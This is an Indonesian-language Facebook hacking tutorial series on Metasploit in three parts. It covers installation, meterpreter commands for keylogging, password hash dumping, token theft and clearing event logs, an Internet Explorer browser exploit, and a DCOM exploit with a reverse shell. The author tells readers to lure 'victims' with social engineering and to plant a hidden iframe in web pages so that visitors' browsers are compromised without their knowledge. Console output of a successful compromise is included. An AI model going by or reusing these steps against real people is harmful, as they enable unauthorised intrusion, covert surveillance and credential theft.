Kali ini saya coba share ulang tentang metasploit, bagi anda member lama group
ini mungkin tidak asing dengan tutor ini.
Anda mungkin mengenal saya (Luciffer) di akun yang lain, bagus eko, wahyu setyanto,
satria baja hitam, dan akun lainnya..dikarenakan saya melanggar TOS dari facebook lewat
tutor saya, alhasil semua akun itu di nonaktifkan oleh pihak facebook, sekarang saya
UNMASK di akun pribadi tapi tetap dengan tutor UNCENSORED cuma sekarang lebih
agak di tahan dikit.. :P
Kali ini kita bahas tentang teknik hacking basic level networking, basic di level networking
karena itu hal awal kita memulai mendalami dunia hacking. kita menggunakan tools Metasploit :D ,
Metasploit ini salah satu yang terbaik untuk hacking jaringan, bisa dikatakan tools sejuta umat.
Salah satu distro yang terbaik untuk hacking adalah Kali Linux. distro ini dilengkapi dengan
metasploit pra-instal, jadi jika Anda ingin menggunakan Kali linux, anda bisa melewatkan beberapa
langkah tutorial ini.
Di sini, saya akan memandu Anda bagaimana cara men-download dan menginstal pada
salah satu distro Linux paling populer yaitu Ubuntu. atau di beberapa distro linux yang Pre-Installer
metasploit. berikut tahapannya :
1. Supaya powerfull menjalankan metasploit ini, kita harus menginstall ruby terlebih
dahulu (update)
Perintahnya :
#sudo apt-get install ruby1.9.1 build-essential
2. kemudian kita install metasploit, sesuaikan dengan system anda apakah 32 atau
64 bit, mendownload metasploit 32 bit dengan wget, perintahnya :
#wget http://downloads.metasploit.com/…/metasploit-latest-linux-x…
dan untuk 64 bit, perintahnya :
#wget http://downloads.metasploit.com/…/metasploit-latest-linux-x…
4. Dan sekarang kita jalankan installer (menggunakan superuser atau root melalui
perintah sudo, Anda akan diminta untuk memasukkan password root Anda untuk
menggunakan perintah ini.):
#sudo ./metasploit-latest-linux-x*-installer.run
Ikuti petunjuk di installer sampai dengan selesai.
7. untuk selanjutnya adnda bisa setiap waktu mengupdate tools ini supaya up to
date :D perintahnya :
#msfupdate
selanjutnya saya akan terangkan fungsi basic command dari metasploit ini
diantaranya :
#? - help menu
#help - help menu
#background - meletakan sesi saat ini untuk latar belakang
#bgkill - kills background meterpreter script
#bglist - memberikan daftar semua skrip yang berjalan di background
#bgrun - menjalankan script di background thread
#channel - menampilkan channel yang aktiv
#close - menutup channel yang aktiv
#exit - mengakhiri sessi meterpreter
#quit - mengakhiri sessi meterpreter
#interact - berinteraksi dengan channel
#irb - masuk ke Ruby scripting mode
#migrate - memindahkan proses aktif untuk PID yang ditunjuk
#read - membaca data dari channel
#run - mengeksekusi meterpreter script yang sudah di setting
#use - memuat ekstensi meterpreter
#write - menulis data di channel
Perintah File System
#cat - mambaca output dari isi file
#cd - mengganti direktory target
#del - menghapus file di target
#download - download file dari system target ke system si attacker
#edit - edit file
#getlwd - menampilkan local directory
#getwd - menampilkan directory yang bekerja di target
#lcd - mengganti local directory
#lpwd - menampilkan local directory
#ls - list files dalam directory
#mkdir - membuat directory di system korban
#pwd - menampilkan working directory
#rm - menghapus file
#rmdir - menghapus directory di system si korban
#upload - upload file dari si attacker system ke komputer korban
Perintah Networking / jaringan
#ipconfig - menampilkan network interfaces dan informasinya termasuk IP addres
dan lainnya
#portfwd - forwards port dari sistem si korban ke remote service
route
Perintah System
#clearav - membersihkan event logs di komputer korban
#drop_token - mendrop token yang dicuri
#execute - mengeksekusi perintah
#getpid - mengambil process ID (PID)
#getprivs - mengambil hak akses jika itu memungkinkan
#getuid - mengambil userID di server yang sedang dijalankan
#kill - mengakhisi process dari PID
#ps - list proses yang sedang dijalankan
#reboot - merestart komputer korban
#reg - berinteraksi dengan registry di komputer korban
#rev2self - memanggil Revert To Self () di komputer korban
#shell - membuka perintah shell di komputer korban
#shutdown - shuts down komputer korban
#steal_token - mencoba untuk mencuri tanda spesifik (PID) proses
#sysinfo - mendapat rincian tentang komputer korban seperti OS dan nama
pengguna
Perintah User Interface
#enumdesktops - daftar semua desktop yang dapat diakses
#getdesktop - mendapatkan dekstop saat meterpreter dijalankan
#idletime - untuk mengecek berapa lama sistem korban tidak dijalankan
#keyscan_dump - dumps dari isi keylogger
#keyscan_start - menjalankan keylogger
#keyscan_stop - menghentikan proses keylogging
#screenshot - mengambil gambar dari meterpreter yang dijalankan
#set_desktop - mengganti meterpreter desktop
#uictl - memungkinkan kontrol dari beberapa komponen user interface
Perintah Password Dump
#hashdump - megambil hash password
Catatan : perintah hashdump yang akan sering terdeteksi software Antivirus, tapi
sekarang ada dua script yang lebih tersembunyi, yaitu "run hashdump" dan "run
smart_hashdump".
Perintah lainnya
#timestomp - memanipulasi, memodifikasi, akses, dan membuat atribut dari sebuah
file
Oke, itu beberapa perintah dalam tools metasploit ini, selanjutnya anda harus
mengerti apa saja yang ada di komponen metasploit :
- Proxi pivoting ..??
- Workspace...???
- Scanning...???
- exploit module...???
- Payloads...???
- Auxiliary module...???
- Listener...???
- Shellcode...???
- Exploit...???
Demikian tutorial cara download, instal, dan perintah perintah dalam metasploit.
selanjutnya silahkan diskusikan mengenai arti pemahaman dari komponen metasploit
diatas sebelum kita melangkah ke tutorial eksekusi.
Enjoy (Y)
Luciffer
[TUTORIAL METASPLOIT Part 2]
Level : Networking (BASIC)
Title : Metasploit
Exploiting IE
Selamat siang….
Kali ini saya akan berikan sedikit tutorial bagian kedua dalam sessi Metasploit
Tapi sebelumnya, pastikan Anda telah membaca tutorial pertama dan memahaminya,
anda bisa baca kembali di link:
https://web.facebook.com/…/1337…/permalink/829253473875957/…
Dalam tutorial ini, kita akan exploitasi komputer korban dengan memanfaatkan
fasilitas browser Microsoft Internet Explorer 6, 7, dan 8, yang berjalan pada Windows XP,
Vista, Windows 7 atau Windows Server 2003 dan 2008.
2) Selanjutnya kita memberitahu Metasploit bahwa exploitasi ini yang akan kita
gunakan.
Kita menggunakan parameter "use" untuk memasukan perintahnya:
#msf> use exploit/windows/browser/ie_unsafe_scripting
5) Jalankan Eksploitasi
Untuk menjalankan mengeksploitasi, cukup ketik:
#msf> exploit (ie_unsafe_scripting) > exploit
kalau session berhasil anda akan mendapatkan result:
#msf>exploit(ie_unsafe_scripting) >
[*] Request received from 192.168.56.102:1080...
[*] Encoding payload into vbs/javascript/html...
[*] Sending exploit html/javascript to 192.168.56.102:1080...
[*] Exe will be uunqgEBHE.exe and must be manually removed from the %TEMP%
directory on the target.
Sending stage (752128 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.101:4444 ->192.168.56.102:1081) at
2016-08-03 14:09:26 +0530
Ini akan menghasilkan link - link berbahaya - yang kita kirim ke komputer target,
dan berharap mereka membukanya dengan sedikit SOCENG.
Ketika target membuka link dalam versi internet explorer, itu akan mengeksploitasi
browser mereka dan kita menguasai komputer mereka.
Berikut adalah cara yang baik untuk mengeksploitasi browser target tanpa mereka
sadari:
Cattan: Dengan sedikit kode HTML sederhana, kita bisa menambahkan link dengan
menanam "iframe" pada source halaman web.
Untuk melakukannya, kita hanya menambahkan kode html ini di mana saja di
dalam <body> halaman Anda:
misal :
<Iframe src = "http://192.168.56.101:8080/2IGIaOJQB"> </ iframe>
Ketika halaman ini buka pada komputer korban, browser mereka akan dieksploitasi,
7) selanjutnya kita buka session yang sedang berjalan tersebut, dengan mengetik
perintah :
# msf> exploit (ie_unsafe_scripting) > sessions
8)Selanjutnya kita buat channel aktiv untuk windows target dengan mengetikan
perintah sessions -i 1:
#msf> exploit (ie_unsafe_scripting) > sessions -i 1
meterpreter > shell
Process 4844 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7264]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:Windowssystem32>
dan itu akan membuka sesi meterpreter aktif yang sedang kita gunakan, kita bisa
mengendalikan komputer mereka.
ini yang saya namakan "kuasai komputer korban dalam jaringan"
Demikian, sedikit tutorial cara exploitasi browser default windows
kita lanjut dengan methode exploitasi lainnya di tutorial selanjutnya
Enjoy (Y)
Luciffer
[TUTORIAL METASPLOIT Part 3]
Level : Networking (BASIC)
Title : Metasploit
Selamat pagi…..
Langkah langkah :
1) Jalankan metasploit, buat workspace.
Untuk memilih exploiter yang kita inginkan, kita akan mencari database metasploit
menggunakan perintah "search" . kita gunakan DCOM untuk exploiter, perintahnya:
#msf> search DCOM
3)Setting exploit
Kita sekarang perlu mensetting sebelum mengeksploitasi,dan melihat apa isi
setingannya kita gunakan parameter "show options", perintahnya :
#msf > show options
Selanjutnya ada 2 pilihan yang perlu di set, yaitu RHOST dan LHOST.
RHOST adalah alamat IP komputer target, misalnya disini192.168.1.10. kita akan
exploit menggunakan port 135 untuk terhubung ke komputer korban.
sedangkan LHOST adalah alamat IP attacker, dalam hal ini 192.168.1.8. kita
gunakan parameter " set ",pengaturannya kira kira seperti ini:
#msf> set RHOST 192.168.1.10
#msf> set LHOST 192.168.1.8
4)Memilih Payload
Payload untuk exploit ini akan dijalankan oleh "buffer overflow".kita cari pilihan nya
dengan parameter "show", perintahnya:
#msf> show payloads
kali ini kita akan gunakan payload untuk membuka reverse shell pada sistem target,
dari daftar payload, kita akan memilih "generic/shell_reverse_tcp", dengan
menggunakan perintah "set":
#msf > set PAYLOAD generic/shell_reverse_tcp
6) Exploit
sekarang kita jalankan exploit,dengan perintah:
#msf> exploit
Regard's
Luciffer